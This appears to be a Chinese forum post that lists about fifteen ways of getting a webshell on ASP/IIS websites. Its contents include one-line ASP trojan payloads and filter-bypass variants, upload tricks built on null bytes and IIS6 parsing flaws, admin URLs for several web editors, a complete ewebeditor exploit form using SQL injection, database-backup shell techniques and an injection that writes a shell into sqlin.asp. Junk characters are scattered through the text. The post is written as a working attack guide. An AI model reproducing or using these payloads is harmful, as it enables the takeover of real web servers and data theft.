- 帖子
- 228
- 积分
- 645
- 威望
- 810
- 金钱
- 1192
- 在线时间
- 63 小时
|
1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式$ @" A" k @7 X) U5 s
# ], f3 g7 y* e% u @
2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试<%eval request("value")%>来突破,例如config.asp
6 D/ @; g0 P: u
) c( N+ z/ Y; O# S2 |5 ?3.上传漏洞:* X2 _8 V( y, Z" J# q6 p1 Q1 i
q8 ~/ C2 o3 ^, ?动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00: `4 E% T, ]; W- P, [
/ Q" c) G: }4 P# p ?6 C! p
逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件) J) D7 _- V# Q% t, R
1 k# L7 S; q3 \" N$ Y
雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp
1 h& c2 } M, o! t; o. a然后在上传文件里面填要传的图片格式的ASP木马, }! Y' p, D# C2 q7 Y: L ]) y
就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp
+ W( T- j; W! C4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传; {" m1 y- `+ \$ @# |
; P; y; n) [% O1 ], @
<html># f+ e4 i" w1 k& k; B" |
<head>
9 {# o* u% j& ?& l( i+ E8 y<title>ewebeditor upload.asp上传利用</title>
+ B( `- ?$ W* ^2 H) g$ H: O</head>( @1 ^: D+ \2 q( y. R; r: Y
<body>7 } w2 }1 ]8 z
<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">
& A L2 r" L9 E$ J: N; R<input type=file name=uploadfile size=100><br><br>
, m1 y9 N9 b, B: s& a<input type=submit value=Fuck>% k: h: M& P+ U; v9 d' M+ N1 D
</form>
z9 m: e, G) }' q</body>! G% l* n9 _5 j
</form>
# R3 t* o! I& [, I</html>* u2 M' @& C5 S c j' D. j* J
: M( d; }- m5 v1 m2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问 h- _( J% w; \+ e
5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
2 O; L$ [ q& R9 w# l4 F; z( |) E% J7 k8 F, F
利用windows2003解析。建立zjq.asp的文件夹* l* z& Q a0 R" P
8 g, D' }+ s* i& F! w7 l% o( N# F
6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型& x# ~+ i: E( A# j6 Y" I: W8 ]
2 N: B& e0 L! E" s8 g0 m+ u _ f
7.cuteeditor:类似ewebeditor
+ t1 h h4 z3 e2 ~
8 ]: A- n* j/ y8.htmleditor:同上6 M1 ]) `3 Z) M2 F7 N* V
) p$ R# X' F( I$ O% P
9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破4 j) Q6 A D' o
/ ]! y$ ]- \6 `* F9 f. a+ Y
<%execute request("value")%><%'<% loop <%:%>' ^6 a6 ~% d% I) o) f
9 J2 f6 f7 m: k8 x% I) o5 {
<%'<% loop <%:%><%execute request("value")%>9 ^# E# U7 n& C2 a# J" O
5 F E2 W8 V% m4 N<%execute request("value")'<% loop <%:%>9 W( o* ]0 f! o- u3 e
9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞
: p- g0 Q; ~5 d1 n1 o7 `' x+ h! }4 `) F+ O
10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞# S9 i' @( F( Z5 z9 G# J
{* @% F \# g
11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3
8 n( Y* R- a% `3 q4 r3 O/ g K5 ]. l0 @( k/ r% S6 H$ @5 v5 N! S
解析漏洞得到webshell
( B8 @; B& q- }% p0 b# [2 t
4 L- n8 n. {, a0 [: r1 Z& j12.mssql差异备份,日志备份,前提需知道web路径
6 k" K; E: {8 ^* P' w7 I
& _' x. K. {6 u3 _13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell
/ M' {$ I* K, o( E' c
' R/ h& y/ D" G( r1 Z$ A4 {. K& j14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell# D" j% D& L. r" l4 ]8 ~5 L
" I2 v1 d, n0 C/ Q& u7 p+ Q* `15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可$ [$ A7 r$ H! q% z; _
! [, e& e" d- g4 Q( O) p
以上只是本人的一些拙见,并不完善,以后想到了再继续添加
* l8 R7 n- @/ o7 P. }不是我原创。我的朋友,飞鸟游鱼原创的 |
-
2
评分人数
-
|